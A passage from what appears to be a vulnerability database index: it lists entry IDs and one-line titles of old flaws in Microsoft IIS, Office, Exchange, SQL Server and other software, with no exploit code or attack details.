Word Viewer 2003 memory corruption [48498] Microsoft IIS 5.0/5.1/6.0 Password Protection weak authentication [48409] IBM DB2 8.0/9.1/9.5 on Windows Configuration [48157] Microsoft PowerPoint 2002 Sound memory corruption [48156] Microsoft PowerPoint 2000 memory corruption [48155] Microsoft PowerPoint 2002 Notes Container memory corruption [48154] Microsoft PowerPoint 2002 Sound PP7X32.DLL memory corruption [48153] Microsoft PowerPoint 2002 Sound privilege escalation [48152] Microsoft PowerPoint 2002 PP4X32.DLL memory corruption [48151] Microsoft PowerPoint 2002 memory corruption [48150] Microsoft PowerPoint 2002 Sound privilege escalation [48149] Microsoft PowerPoint 2002 privilege escalation [48148] Microsoft PowerPoint 2002 Sound privilege escalation [48147] Microsoft PowerPoint 2002 Sound privilege escalation [48146] Microsoft PowerPoint 2002 Numeric Error [47718] Microsoft Excel 2000/2002/2003/2007 Spreadsheet denial of service [47716] Microsoft Office Converter Pack 2003 WPFT632.CNV privilege escalation [46594] Trend Micro InterScan Web Security Virtual Appliance 3.1 Windows Media Player information disclosure [46455] Microsoft Exchange Server 2007 privilege escalation [46454] Microsoft Exchange Server 2007 denial of service [46343] F-Secure Anti-Virus up to 8.00 on Windows Numeric Error [46327] Microsoft Word 2007 information disclosure [45388] CA ARCserve Backup up to R12.0 on Windows memory corruption [45379] Microsoft Office SharePoint Server 2007 weak authentication [45375] Symantec Backup Exec 12.0 on Windows memory corruption [45374] Symantec Backup Exec 12.0 on Windows weak authentication [45131] Microsoft Office Communicator denial of service [45130] Microsoft Office Communicator denial of service [45040] Microsoft .NET Framework 2.0.50727 Code Access Security weak encryption [44970] Novell eDirectory up to 8.8 on Windows denial of service [44958] Microsoft SharePoint Server cross site scripting [44855] DjVu Activex Control For Microsoft Office 2000 3.0 ActiveX Control DjVu_ActiveX_MSOffice.dll memory corruption [44665] Microsoft Peachtree Accounting 2004 ActiveX Control PAWWeb11.ocx unknown vulnerability [44589] Microsoft Exchange Server 2003 Outlook Web Access directory traversal [44238] Microsoft iis ActiveX Control iisext.dll privilege escalation [44237] Microsoft iis ActiveX Control adsiis.dll privilege escalation [44047] Microsoft SQL Server 2000 ActiveX Control SQLVDIRLib.SQLVDirControl memory corruption [43957] Microsoft Office 2003/2007/Xp gdiplus.dll Numeric Error [43956] Microsoft Office 2003/2007/Xp gdiplus.dll memory corruption [43955] Microsoft Office 2003/2007/Xp gdiplus.dll denial of service [43952] Microsoft Office 2003/2007/Xp URI privilege escalation [43822] Microsoft .NET Framework 1.1 Request Validation cross site scripting [43821] Microsoft .NET Framework 1.1 Request Validation cross site scripting [43723] Microsoft Visual Studio Masked Edit Control Msmask32.ocx memory corruption [43662] Microsoft PowerPoint Viewer 2000 SP3/2002 SP3/2003 SP2/2007 SP1 denial of service [43661] Microsoft PowerPoint Viewer 2003 denial of service [43660] Microsoft PowerPoint Viewer 2003 denial of service [43657] Microsoft Office 2000/2003/Xp denial of service [43654] Microsoft SharePoint Server 2007 denial of service [43653] Microsoft Office 2000/2002/2004/2008 privilege escalation [43652] Microsoft Office 2000/2002/2003/2004/2008 privilege escalation [43103] Microsoft Exchange Srv 2007 Sp1 Outlook Web Access cross site scripting [43087] Microsoft Office Snapshot Viewer ActiveX up to Office 2003 Snapshot Viewer ActiveX Control snapview.ocx privilege escalation [42966] Novell iPrint Client up to 4.34 Client for Windows ienipp.ocx memory corruption [42816] Microsoft Word 2000/2003 denial of service [42326] Microsoft Office up to Xp denial of service [42317] TFTP Server SP 1.4/1.5 on Windows memory corruption [42065] Microsoft SharePoint Server 2.0 Rich Text Editor cross site scripting [41881] Microsoft Office 2003/2007/2007 Sp1/Xp denial of service [41880] Microsoft Project 2000/2002/2003 denial of service [41613] BootManage TFTPD Windows memory corruption [41455] Microsoft Office 2000/2003/2004/Xp privilege escalation [41454] Microsoft Excel 2000/2002/2003/2007 memory corruption [41453] Microsoft Excel 2000/2002/2003 privilege escalation [41452] Microsoft Excel 2000/2002/2003/2007 privilege escalation [41451] Microsoft Excel 2000/2002/2003 privilege escalation [41450] Microsoft Excel 2000 privilege escalation [41449] Microsoft Excel 2000/2002/2003 privilege escalation [41448] Microsoft Office 2000/Xp Office Web Components privilege escalation [41289] Symantec Backup Exec 12.0 on Windows ActiveX Control pvcalendar.ocx privilege escalation [41288] Symantec Backup Exec 12.0 on Windows ActiveX Control pvcalendar.ocx memory corruption [41003] Microsoft Office 2000/2003/2004/Xp denial of service [41002] Microsoft Office 2000/2003/Xp denial of service [40985] Microsoft IIS up to 6.0 privilege escalation [40084] 3ivx Mpeg-4 Codec 4.5.1 Windows Media Player mplayer2.exe memory corruption [40042] Microsoft Access memory corruption [40020] Microsoft Office 2007 ZIP Container privilege escalation [38957] Microsoft SQL Server privilege escalation [38899] Microsoft ISA Server 2004 information disclosure [38782] Microsoft Visual Studio up to 6.0 ActiveX Control pdwizard.ocx privilege escalation [38728] Microsoft SQL Server 2005 Enterprise Manager sqldmo.dll memory corruption [38595] Microsoft MSN Messenger 7.0 memory corruption [38253] Microsoft Visual Studio 6.0 ActiveX Control vdt70.dll NotSafe memory corruption [38184] Atheros 802.11 ABG Wireless Adapter Driver up to 802.10 on Windows denial of service [38026] Sun Java System Application Server up to 8.2 on Windows unknown vulnerability [37739] Microsoft Excel 2000/2002/2003/2004/2007 memory corruption [37738] Microsoft Office 2002/2003 memory corruption [37566] Microsoft Excel 2003 unknown vulnerability [37508] Microsoft MSN Messenger 4.7 denial of service [37352] Microsoft Office DataSourceControl memory corruption [37173] Microsoft Office htimage.exe unknown vulnerability [37010] Microsoft Office 2000 ActiveX Control ouactrl.ocx memory corruption [37004] Microsoft IIS memory corruption [36628] Microsoft Word 2000/2002/2003/2004 winword.exe privilege escalation [36621] Microsoft Exchange Server 2000 Numeric Error [36620] Microsoft Exchange Server 2000 Outlook Web Access cross site scripting [36619] Microsoft Exchange Server 2000/2003/2007 MIME memory corruption [36618] Microsoft Exchange Server 2000 denial of service [36617] Microsoft Excel 2000/2002/2003/2004 memory corruption [36051] Microsoft Word 2007 file798-1.doc memory corruption [36050] Microsoft Word 2007 file789-1.doc memory corruption [36041] Microsoft .NET Framework 2.0.50727.42 cross site scripting [35684] Microsoft Visual Studio mfc42u.dll afxoleseteditmenu memory corruption [35373] Microsoft Excel 2003 denial of service [35372] Microsoft Office 2003 denial of service [35161] Microsoft ISA Server 2004 unknown vulnerability [35011] Microsoft PowerPoint memory corruption [35001] Microsoft Office 2000/2003/2004/Xp privilege escalation [35000] Microsoft Word 2000/2002/2003 privilege escalation [34993] Microsoft Office 2000/2003/Xp memory corruption [34991] Microsoft Visual Studio 8.0 msvcr80.dll denial of service [34592] Microsoft Visual Studio 6.0 msdev.exe memory corruption [34322] Microsoft Office 2000/2003/Xp memory corruption [34321] Microsoft Office 2000/2003/2004/Xp Spreadsheet memory corruption [34320] Microsoft Office 2000/2003/2004/Xp memory corruption [34319] Microsoft Office 2000/2003/2004/Xp memory corruption [34318] Microsoft Office 2000/2003/2004/Xp memory corruption [34253] Microsoft IIS denial of service [34126] Microsoft Office 2003 memory corruption [34122] Microsoft Office Web Components 2000 privilege escalation [33866] Microsoft IIS 5.1 Web Directory com privilege escalation [33851] Microsoft Word 2000/2002/2003 12122006-djtest.doc memory corruption [33766] Microsoft Word 2000/2002/2003 memory corruption [33067] Microsoft Visual Studio .net 2005 ActiveX Control wmiscriptutils.dll memory corruption [32693] Microsoft Word 2004 memory corruption [32690] Microsoft Office 2000/2003/2004/Xp privilege escalation [32689] Microsoft Excel 2000/2002/2003/2004/XP memory corruption [32688] Microsoft Excel 2000/2002/2003/2004/XP memory corruption [32687] Microsoft Word 2000/2002 memory corruption [32686] Microsoft Office 2000/2001/2003/2004 Numeric Error [32685] Microsoft Office 2000/2001/2003/2004 memory corruption [32676] Microsoft Office 2000/2001/2003/2004 privilege escalation [32675] Microsoft Office 2000/2003/2004/Xp privilege escalation [32055] Microsoft Visual Studio 6.0 tcprops.dll memory corruption [32006] Cybozu Garoon 2.1.0 For Windows sql injection [31692] Microsoft PowerPoint 2000/2001/2002/2003 memory corruption [31691] Microsoft Hyperlink Object Library hlink.dll object memory corruption [31679] IBM Informix Dynamic Server up to 9.40 on Windows memory corruption [31358] Microsoft PowerPoint 2003 powerpnt.exe denial of service [31354] Microsoft PowerPoint 2003 memory corruption [31351] Microsoft ISA Server 2004 Filters unknown vulnerability [31318] Microsoft Excel 2000/2002/2003/2004/XP privilege escalation [31317] Microsoft Excel 2000/2002/2003/2004/XP privilege escalation [31316] Microsoft Excel 2000/2002/2003/2004/XP privilege escalation [31313] Microsoft Excel 2000/2002/2003/2004/XP privilege escalation [31312] Microsoft Excel 2000/2002/2003/2004/XP privilege escalation [31311] Microsoft Excel 2000/2002/2003/XP privilege escalation [31310] Microsoft Excel 2000/2002/2003/2004/XP memory corruption [31237] Microsoft Office 2000/2003/Xp privilege escalation [31235] Microsoft Office 2000/2003/Xp memory corruption [31233] Microsoft Office 2000/2003/Xp mso.dll lscreateline memory corruption [29831] Microsoft Malware Protection Engine up to 1.1.10600.0 privilege escalation [29524] Microsoft ISA Server 2004 unknown vulnerability [29423] Microsoft Office 2000/2003/2004/Xp excel.exe privilege escalation [29414] Microsoft .NET Framework 1.0/1.1 memory corruption [29209] Microsoft Office 2000/2003/2004/Xp memory corruption [29208] Microsoft Office 2000/2003/2004/Xp memory corruption [29207] Microsoft Office 2000/2003/2004/Xp memory corruption [29206] Microsoft Office 2000/2003/2004/Xp memory corruption [29205] Microsoft Office 2000/2003/2004/Xp memory corruption [29005] Lighttpd 1.4.10 on Windows response.c information disclosure [28939] Microsoft Word 2003 denial of service [25752] Microsoft MSN Messenger weak encryption [25649] Microsoft IIS 5.0 Application Firewall cross site scripting [25518] Microsoft ISA Server 2000 Packet Filter unknown vulnerability [25517] Microsoft ISA Server 2000 unknown vulnerability [25397] Microsoft ISA Server 2000 wspsrv.exe denial of service [24822] Microsoft Outlook 2003 Outlook Web Access weak authentication [24640] Microsoft Office InfoPath 2003 SP1 information disclosure [24510] Microsoft Word 2000/2002/2003 memory corruption [24284] Microsoft SharePoint Team Services cross site scripting [24280] Microsoft Exchange Server up to 5.0 memory corruption [23648] Microsoft Word 6.0 memory corruption [22126] Microsoft Outlook 2003 Access Restriction privilege escalation [68417] Microsoft Exchange 2013 Outlook Web Access privilege escalation [68416] Microsoft Exchange 2007/2010/2013 Outlook Web Access privilege escalation [68409] Microsoft Office 2007/2010/2013 memory corruption [68408] Microsoft Excel 2007/2010/2013 privilege escalation [68407] Microsoft Excel 2007/2010 privilege escalation [68406] Microsoft Word memory corruption [68405] Microsoft Word 2007/2010 Index privilege escalation [68404] Microsoft IIS 7.5 Error Message mypage cross site scripting [68193] Microsoft IIS 8.0/8.5 IP/Domain Restriction privilege escalation [68191] Microsoft SharePoint 2010 cross site scripting [68188] Microsoft Word 2007 File privilege escalation [68187] Microsoft Word 2007 File privilege escalation [68186] Microsoft Word 2007 File privilege escalation [68185] Microsoft .NET Framework up to 4.5.2 Object privilege escalation [67829] Microsoft Office 2007/2010/2011 Object privilege escalation [67825] Microsoft .NET Framework 2.0/3.5/3.5.1 ASLR privilege escalation [67824] Microsoft .NET Framework up to 4.5.2 denial of service [67823] Microsoft .NET Framework up to 4.5.2 ClickOnce privilege escalation [67518] Microsoft Lync 2013 denial of service [67517] Microsoft Lync 2013 Script Reflected cross site scripting [67516] Microsoft Lync 2010/2013 privilege escalation [67514] Microsoft .NET Framework up to 4.5.2 Hash Collision Form denial of service [67452] Novell GroupWise Client 8.0x/2012/2014 on Windows denial of service [67361] Microsoft .NET Framework 1.1/2.0/3.0/3.5/3.5.1 ASLR privilege escalation [67360] Microsoft SharePoint 2013 App Permission Management privilege escalation [67354] Microsoft SQL Server 2008 R2 SP2/2008 SP3/2012 SP1/2014 SQL Master Data Services denial of service [67353] Microsoft SQL Server 2008 R2 SP2/2008 SP3/2012 SP1/2014 T-SQL Query cross site scripting [66976] Microsoft Access 2010 VBA denial of service [21964] Microsoft Java Virtual Machine 5.0.0.3810 Sandbox privilege escalation [21838] Microsoft Sharepoint Portal Server 2001 cross site scripting [21586] HD Soft Windows FTP Server up to 1.6 wscanf Format String [20941] NIPrint LPD-LPR Print Server up to 4.10 Windows Explorer Invoker privilege escalation [20870] Microsoft Wordperfect Converter Corel Wordperfect File memory corruption [20869] Microsoft Access 97/2000/2002 Snapshot Viewer ActiveX Control memory corruption [20732] Microsoft SQL Server 7.0/2000 Named Pipe denial of service [20695] Microsoft ISA Server Error Page 400.htm/500.htm cross site scripting [20581] Sun One Application Server 7.0 on Windows Error Message cross site scripting [20580] Sun One Application Server 7.0 on Windows URI weak authentication [20579] Sun One Application Server 7.0 on Windows JSP Request Source information disclosure [20395] Microsoft Proxy Server/ISA Server Winsock Service denial of service [20327] Microsoft Word/Excel 98 Field Code information disclosure [20214] Microsoft ISA Server 2000 DNS Intrusion Detection Application Filter denial of service [20162] National University Of Singapore uxterm 2.3/2.4.1 Windows Title privilege escalation [20111] Apache HTTP Server up to 2.0.43 on Windows HTTP Request privilege escalation [20109] Microsoft Outlook 2002 V1 Exchange Server Security Certificate weak encryption [20037] Trend Micro Interscan Viruswall 3.52 on Windows gzip Content Encoding privilege escalation [19743] Microsoft Outlook 2002 javascript URI cross site scripting [19742] Microsoft Outlook 2000/2002 IFRAME privilege escalation [19671] Apache HTTP Server 1.3.20 on Windows /php/ privilege escalation [19650] Apache Tomcat 4.0.3 on Windows HTTP Request information disclosure [19623] Microsoft SQL Server up to 2000 SP2 Stored Procedure sp_MSSetServerProperties/sp_MSsetalertinfo privilege escalation [19563] MySQL up to 3.20.52 on Windows Service privilege escalation [19550] Microsoft IIS 5.0/5.1 HTTP Request denial of service [19518] Microsoft Exchange 2000 Request denial of service [19515] Microsoft Exchange 2000 Remote Procedure Call denial of service [19514] Microsoft SQL Server up to 2000 Authentication Password weak encryption [19500] Oracle Application Server up to 9.0.2.0.1 on Windows web-inf privilege escalation [19497] Macromedia JRun 3.0/3.1/4.0 on Windows web-inf privilege escalation [19474] Microsoft MSN Messenger up to 4.6 Request denial of service [19452] MySQL up to 3.23.2 on Windows weak authentication [19433] Microsoft IIS 4.0/5.0 SMTP Service privilege escalation [19388] Microsoft IIS 5.0 CodeBrws.asp memory corruption [19387] Microsoft IIS 5.0 CodeBrws.asp directory traversal [19361] Microsoft IIS 5.1 Frontpage Server Extension File colegal.htm directory traversal [19360] Microsoft IIS 5.1 GET Request /_vti_pvt/access.cnf Path information disclosure [19359] Microsoft Office XP Spreadsheet Host privilege escalation [19342] Microsoft MSN Messenger up to 4.6 memory corruption [19338] Microsoft IIS 4.0 File privilege escalation [19222] Microsoft Office Web Components 10 DataSourceControl ConnectionFile information disclosure [19221] Microsoft Office Web Components 10 Spreadsheet File information disclosure [19220] Microsoft Office Web Components 9/10 Chart Load File information disclosure [19218] Microsoft Outlook 2002 Header Field denial of service [19181] Microsoft Java Virtual Machine 1.1 Restriction privilege escalation [19180] Microsoft Java Virtual Machine 1.1 HTML Object Reference privilege escalation [19179] Microsoft Java Virtual Machine 1.1 CabCracker com.ms.vm.loader.cabcracker load0 privilege escalation [19178] Microsoft Java Virtual Machine up to 5.0.3805 Standard Security Manager com.ms.security.StandardSecurityManager privilege escalation [19177] Microsoft Java Virtual Machine 1.1 privilege escalation [19176] Microsoft Java Virtual Machine 1.1 Applet ClipBoardGetText/ClipBoardSetText Clipboard privilege escalation [19175] Microsoft Java Virtual Machine 1.1 getNativeServices memory corruption [19174] Microsoft Java Virtual Machine 1.1 getabsolutepath Directory information disclosure [19173] Microsoft Java Virtual Machine up to 1.1 Class Name Class.forName/ClassLoader.loadClass memory corruption [19172] Microsoft Java Virtual Machine 1.1 URL privilege escalation [19136] Microsoft IIS 5.0/5.1 WebDAV Memory denial of service [19135] Microsoft IIS up to 5.1 cross site scripting [19134] Microsoft IIS 5.0 Source Access Permission Script privilege escalation [19133] Microsoft IIS up to 5.1 dllhost.exe privilege escalation [19087] Microsoft SQL Server up to 7.0 Stored Procedure xp_runwebtask privilege escalation [19060] Microsoft SQL Server 7.0/2000 Data Engine privilege escalation [19059] Microsoft SQL Server 7.0/2000 Database Console Command memory corruption [18800] Microsoft SQL Server 2000 Authentication memory corruption [18789] Microsoft SQL Server 2000 SP2 Stored Procedure sp_MScopyscript privilege escalation [18786] Microsoft File Transfer Manager up to 3.x ActiveX Control Persist weak authentication [18785] Microsoft File Transfer Manager up to 3.x ActiveX Control memory corruption [18777] Microsoft Project 2000/2002 Office Web Components Copy/Paste privilege escalation [18776] Microsoft Project 2000/2002 Office Web Components LoadText File information disclosure [18774] Microsoft Project 2002 Office Web Components setTimeout privilege escalation [18755] Microsoft SQL Server 2000 Jet Engine opendatasource memory corruption [18745] Microsoft SQL Server 7.0/2000 Extended Stored Procedure privilege escalation [18742] Apache HTTP Server up to 2.0.39 on Windows/OS2/Netware Error Message Path information disclosure [18615] Microsoft SQL Server 2000 0x08 Packet denial of service [18609] Microsoft Exchange 5.5 Mail Connector memory corruption [18607] Microsoft SQL Server 7.0/2000 Data Access Components OpenRowSet memory corruption [18605] Apache HTTP Server up to 2.0.39 on Windows/OS2/Netware Backslash directory traversal [18598] Microsoft SQL Server 2000 Keep-Alive denial of service [18597] Microsoft SQL Server 2000 Resolution Service memory corruption [18596] Microsoft SQL Server 2000 Stored Procedure sql injection [18595] Microsoft SQL Server 2000 DBCC memory corruption [18593] Microsoft Word 2000 Mail Merge Tool privilege escalation [18592] Microsoft Excel 2000/2002 Macro Security privilege escalation [18591] Microsoft Excel 2000/2002 Macro Security privilege escalation [18590] Microsoft Excel 2000/2002 Macro Security privilege escalation [18528] Microsoft MSN Messenger 3.6 Communication weak authentication [18498] Microsoft IIS 5.0/5.1 WebDAV IP Address information disclosure [18497] Microsoft IIS 4.0 Change Password /iisadmpwd privilege escalation [18495] Microsoft IIS up to 5.1 NTLM Authentication information disclosure [18449] Microsoft .NET Framework 1.0 orderdetails.aspx information disclosure [18411] Microsoft SQL Server 2000 Query memory corruption [18410] Microsoft SQL Server 2000 Password Encryption memory corruption [18348] Microsoft IIS 4.0/5.0 HTR Request memory corruption [18346] Microsoft SQL Server 2000 SQLXML cross site scripting [18345] Microsoft SQL Server 2000 SQLXML ISAPI Extension memory corruption [18245] Microsoft Exchange 2000 RFC Message Attribute denial of service [18173] Apache HTTP Server 2.0.28 on Windows CGI Module php.exe Path information disclosure [18146] Microsoft MSN Messenger Service for Exchange 4.5/4.6 ActiveX Control memory corruption [18138] Microsoft Word 2000/2002 Rich Text Format cross site scripting [18134] Microsoft MSN Messenger 4.0 ActiveX Object information disclosure [18095] Microsoft SQL Server 7.0/2000 Extended Stored Procedure memory corruption [18076] Microsoft IIS 4.0/5.0/5.1 HTTP Header memory corruption [18075] Microsoft IIS 4.0/5.0/5.1 ASP Server-Side Include memory corruption [18074] Microsoft IIS 4.0/5.0/5.1 Error Page cross site scripting [18073] Microsoft IIS 4.0/5.0/5.1 ASP Data Transfer memory corruption [18072] Microsoft IIS 4.0/5.0 Chunked Encoding Transfer memory corruption [18071] Microsoft IIS 4.0/5.0/5.1 Error cross site scripting [18070] Microsoft IIS 4.0/5.0/5.1 Help File Search cross site scripting [18069] Microsoft IIS 4.0/5.0/5.1 FTP Service denial of service [18068] Microsoft IIS 4.0/5.0/5.1 URL Parser w3svc.dll denial of service [18067] Microsoft IIS 4.0/5.0 HTR ISAPI Extension ism.dll memory corruption [17961] Microsoft SQL Server 7.0/2000 OLE DB Provider memory corruption [17955] Microsoft Exchange 2000 Privilege Registry privilege escalation [17948] Microsoft Office on Mac PID Checker denial of service [17852] Microsoft ISA Server 2000 UDP Packet denial of service [17762] Microsoft SQL Server 7.0/2000 C Runtime Format String [17759] Microsoft SQL Server 7.0/2000 memory corruption [17743] Citrix ICA Client 6.1 on Windows ICA File privilege escalation [17735] Microsoft IIS 5.0 Content-Length Header denial of service [17662] Microsoft Exchange 5.5 Outlook Web Access privilege escalation [17604] Microsoft IIS 3.0/4.0/5.0 Web Log Entry weak authentication [17583] Microsoft Excel/PowerPoint 98/2000/2001/2002 Data Stream privilege escalation [17571] Microsoft Exchange 5.5 Outlook Web Access User information disclosure [17569] Microsoft IIS 4.0 Redirect denial of service [17424] Microsoft IIS up to 4.0 Unicode Character Source information disclosure [17388] Microsoft ISA Server 2000 URL cross site scripting [17374] Microsoft ISA Server 2000 H.323 denial of service [17370] Microsoft IIS 5.0 WebDAV denial of service [17360] Microsoft IIS 4.0 Index Server SQLQHit.asp information disclosure [17161] Microsoft Outlook 2002 View ActiveX Control privilege escalation [17050] Microsoft Exchange 2000/5.5 Outlook Web Access cross site scripting [17015] Microsoft Exchange 2000/5.5 LDAP denial of service [16972] IRIX/Linux/Windows MSS denial of service [16965] Microsoft IIS 4.0/5.0 Device File asp.dll Scripting.FileSystemObject denial of service [16917] Microsoft ISA Server 2000 Web Proxy denial of service [16839] Microsoft IIS 5.0 MS01-014/MS01-016 Patches denial of service [16838] Microsoft IIS 5.0 MS00-060 Patch denial of service [16837] Microsoft Internet Information Server 4.0/5.0 FTP Service User information disclosure [16836] Microsoft IIS 5.0 FTP Service denial of service [16835] Microsoft IIS 3.0/4.0/5.0 Escape Character directory traversal [16754] Microsoft Outlook up to 2000 Holiday Feature weak authentication [16709] Microsoft IIS 5.0 WebDAV Request denial of service [16705] Microsoft Exchange/IIS URL Memory denial of service [16602] Microsoft Visual Studio 6.0 VB-TSQL Debugger vbsdicli.exe memory corruption [16599] Microsoft Outlook 2000/98/5.0 vCard memory corruption [16493] Microsoft Exchange 5.0/5.5 SMTP Command memory corruption [16425] Microsoft IIS 4.0/5.0 Frontpage Server Extensions denial of service [16371] Microsoft IIS 4.0/5.0 URL File information disclosure [16369] Microsoft IIS 4.0/5.0 Double Byte Character Set Source information disclosure [16295] Microsoft Exchange 2000 User Account weak authentication [16260] Microsoft IIS 4.0/5.0 Error Message cross site scripting [16181] Microsoft IIS 4.0/5.0 ASP Session Cookie weak authentication [16162] Microsoft IIS 5.0 Index Server privilege escalation [16108] Microsoft IIS 4.0/5.0 Executable Files Parser privilege escalation [16106] Microsoft IIS 4.0/5.0 Unicode directory traversal [16027] Microsoft Exchange 5.5 MIME Header denial of service [15989] Microsoft IIS 4.0 URL INETINFO.EXE denial of service [15930] Microsoft Word 2000 Mail Merge Tool privilege escalation [15920] Microsoft IIS 5.0 ASP File privilege escalation [15912] Microsoft IIS 4.0/5.0 File Permission privilege escalation [15907] Microsoft Word/Excel/Powerpoint 2000 Object Tag memory corruption [15898] Microsoft Outlook 98/2000 vCard denial of service [15895] Microsoft Outlook 97/98/2000 Rich Text Path information disclosure [15888] Microsoft IIS 4.0/5.0 Error Message shtml.dll cross site scripting [15782] Microsoft Outlook up to 2000 Cache privilege escalation [15773] Microsoft Outlook up to 2000 Date Field memory corruption [15770] Microsoft IIS 4.0/5.0 Request privilege escalation [15766] Microsoft IIS 3.0/4.0/5.0 Administrative Script denial of service [15764] Microsoft IIS 2.0/3.0/4.0/5.0/5.1 HTTP 1.0 Request IP Address information disclosure [15626] Microsoft Exchange 4.0/5.0 Field Blank denial of service [15608] Apache HTTP Server up to 1.3.6.2 on Windows Directory information disclosure [15548] Microsoft Outlook up to 98 Message denial of service [15546] Microsoft IIS 4.0/5.0 HTR Request ISM.DLL privilege escalation [15542] Microsoft Office 2000 UA ActiveX Control Show Me privilege escalation [15540] Microsoft IIS 4.0/5.0 File Extension denial of service [15535] Microsoft IIS 4.0/5.0 HTR Request inetinfo.exe denial of service [15530] Microsoft IIS 4.0/5.0 Frontpage Server Extensions shtml.exe Path information disclosure [15444] Microsoft IIS 4.0/5.0 URL privilege escalation [15422] Microsoft Excel 97/2000 XLM 7PK Security Features [15416] Microsoft IIS 4.0/5.0 ISAPI Extension Source information disclosure [15400] Microsoft IIS 4.0 Chunked Transfer Encoding memory corruption [15379] Microsoft SQL Server 7.0 SELECT Statement privilege escalation [15376] Microsoft Clip Art Gallery 5.0 CIL File memory corruption [15364] Microsoft Exchange Read Receipt denial of service [15300] Microsoft IIS 3.0/4.0 Frontpage Server Extensions /_vti_bin/shtml.dll Username information disclosure [15270] Microsoft IIS 3.0/4.0 Sample Internet Data Query Script directory traversal [15265] Microsoft IIS Visual Basic Script denial of service [15243] Microsoft IIS 4.0 IDA/IDQ File Path information disclosure [15206] Microsoft IIS 4.0 Microsoft Visual InterDev weak authentication [15195] Microsoft PowerPoint 95/97 Slide Show privilege escalation [15186] Microsoft IIS 4.0 winmsdp.exe privilege escalation [15163] DEC OpenVMS 5.3/5.5.2 VMS DECwindows/MOTIF weak authentication [15149] Microsoft IIS 4.0 Domain Resolution privilege escalation [15148] Microsoft IIS 3.0 ASP Site denial of service [15141] Microsoft IIS 4.0 FTP Server denial of service [15126] Microsoft Excel 97 Russian New Year Call privilege escalation [15125] Microsoft Exchange 5.0/5.5 NNTP/SMTP denial of service [15123] Microsoft IIS 3.0/4.0 on x86/Alpha HTTP GET denial of service [15120] Microsoft IIS 2.0/3.0 ASP Source information disclosure [15080] Microsoft IIS 4.0 ASP File Source information disclosure [15079] Microsoft IIS 4.0 URL privilege escalation [15056] Microsoft Exchange 5.0/5.5 Access Control List Configuration [15054] Apache HTTP Server on Windows URL privilege escalation [14990] Microsoft SQL Server 7.0 TDS Packet privilege escalation [14905] Microsoft Java Virtual Machine Sandbox Configuration [14860] Microsoft MSN Messenger 4.71.0.10 setupbbs.ocx vAddNewsServer/bIsNewsServerConfigured memory corruption [14853] Microsoft IIS 4.0 File privilege escalation [14783] Microsoft IIS 3.0/4.0 Asian Language Configuration [14772] Microsoft IIS 4.0 HTTP Request privilege escalation [14771] Microsoft IIS 3.0 SSL ISAPI Filter race condition [14759] Microsoft Exchange 5.5 SMTP Address privilege escalation [14731] Microsoft IIS 3.0/4.0 Data Access Components privilege escalation [14722] Microsoft IIS 3.0/4.0 SSL denial of service [14721] Microsoft IIS 4.0 Sun Java HotSpot denial of service [14703] Microsoft Outlook 97/98/2000 X-UIDL Header denial of service [14694] Microsoft IIS 4.0 Request IDC memory corruption [14648] Microsoft IIS denial of service [14640] Microsoft IIS 4.0 codebrws.asp privilege escalation [14639] Microsoft IIS 4.0 code.asp privilege escalation [14638] Microsoft IIS 4.0 viewcode.asp privilege escalation [14637] Microsoft IIS 4.0 showcode.asp privilege escalation [14636] Microsoft Excel 97 Malware Warning privilege escalation [14539] Microsoft Exchange SMTP Service denial of service [14536] Microsoft Frontpage/Personal Web Server URL privilege escalation [14512] Microsoft IIS 2.0/3.0/4.0 ISAPI GetExtensionVersion privilege escalation [14496] Microsoft IIS 3.0/4.0 ASP showfile.asp FileSystemObject privilege escalation [14492] Microsoft IIS 4.0 /IISADMPWD privilege escalation [14467] Microsoft IIS 3.0/4.0 FTP Server memory corruption [14466] Microsoft IIS 4.0 ASP Caching information disclosure [14465] Microsoft IIS 2.0/3.0/4.0/5.0 IISAPI Extension perl.exe information disclosure [14458] Microsoft IIS 3.0/4.0 NLST Command denial of service [14450] Microsoft IIS 4.0 Frontpage Server Extensions fpcount.exe memory corruption [14349] Microsoft IIS Server Side Includes #exec privilege escalation [14324] Microsoft IIS 4.0 Log privilege escalation [14314] Microsoft Access 97 Password weak encryption [14271] Microsoft Exchange 5.5 LDAP Bind bind memory corruption [14157] Microsoft IIS 3.0/4.0 PKCS #1 information disclosure [14140] Microsoft IIS 3.0/4.0 ASP File information disclosure [14074] Microsoft IIS 4.0 File Name privilege escalation [14050] Microsoft Exchange 4.0/5.0 SMTP HELO memory corruption [13974] Microsoft IIS 3.0 newdsn.exe privilege escalation [13908] Microsoft IIS 2.0/3.0 URL denial of service [13812] Microsoft IIS 1.0/2.0/3.0 ASP Code privilege escalation [13725] Microsoft IIS 1.0 cmd privilege escalation [13547] Microsoft Lync 2010/2013 Meeting cross site scripting [13545] Microsoft Word 2007 Embedded Font memory corruption [13462] Microsoft Visual Studio 2002/2003/2005/2010 Debug Interface msdia.dll privilege escalation [13394] IBM DB2 up to 10.5.0.2 on Windows Stored Procedure privilege escalation [13230] Microsoft .NET Framework up to 4.5.1 TypeFilterLevel Check privilege escalation [13229] Microsoft Office 2007/2010/2013 Common Control Library MSCOMCTL.OCX privilege escalation [13228] Microsoft Office 2013 Document information disclosure [13227] Microsoft Office 2007/2010/2013 Chinese Grammar Checker privilege escalation [13226] Microsoft SharePoint Server 2007/2010/2013 Page privilege escalation [13225] Microsoft SharePoint Server 2007/2010/2013 cross site scripting [13224] Microsoft SharePoint Server 2007/2010/2013 Page privilege escalation [12859] Microsoft Word 2003 Office Document memory corruption [12845] Microsoft Word 2003 Office File memory corruption [12844] Microsoft Word 2007/2010 Office File memory corruption [12843] Microsoft Office 2007/2010/2011/2013 XML Parser denial of service [12801] Microsoft Xbox Live Password Recovery weak authentication [12693] haxx.se cURL/libcURL up to 7.35.0 on Windows Schannel SSL Backend privilege escalation [12687] Microsoft Word/Office/Outlook 2003/2007/2010/2013 RTF Document memory corruption [12311] Microsoft Lync 2010 Search privilege escalation [12271] Microsoft .NET Framework up to 4.5.1 HTTP POST privilege escalation [12266] Microsoft .NET Framework 2.0 SP2/3.5.1 ASLR privilege escalation [12265] Microsoft .NET Framework up to 4.5.1 privilege escalation [12185] Microsoft .NET Framework 2/4 HMAC weak authentication [12116] Pidgin 2.10.7 on Windows file:/ gtkutils.c privilege escalation [12089] Microsoft Bing 4.2.0 on Android DNS Response APK File Installation privilege escalation [12070] Apple Pages 2.0/2.0.1/2.0.2/5.0/5.0.1 on Mac Microsoft Word Document denial of service [11951] Microsoft Word/Office/Sharepoint Office File memory corruption [11950] Microsoft Office Compability Pack/Word 2007 SP3 File memory corruption [11949] Microsoft Word Viewer/Office 